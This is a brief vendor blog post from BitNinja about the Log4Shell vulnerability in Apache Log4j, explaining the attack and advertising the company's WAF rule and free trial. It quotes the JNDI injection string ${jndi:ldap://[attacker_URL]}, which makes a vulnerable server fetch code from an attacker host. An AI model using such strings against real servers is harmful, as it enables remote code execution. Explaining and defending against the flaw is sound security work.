On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called "Log4Shell". It has been exposed for the Apache Log4j Java-based logging platform used to access the web server and application logs.
About the vulnerability
To exploit this vulnerability, an attacker could modify the user agent of a web browser to access the website or search the website for a string using the format ${jndi:ldap://[attacker_URL]}. This will add the string to the web server's access log.
If the Log4j application parses these logs and finds a string, the error forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass a Base64-encoded commands or Java classes to execute on a vulnerable device.
Solution by BitNinja
The threat management team of BitNinja found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don't have to do anything. Just sit back and relax. We are taking care of the safety of your servers.
Zero-day vulnerabilities are one of the most dangerous threats out there. Cybersecurity is not optional anymore. It is a must!
If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card is needed!
Let’s make the Internet a safer place together!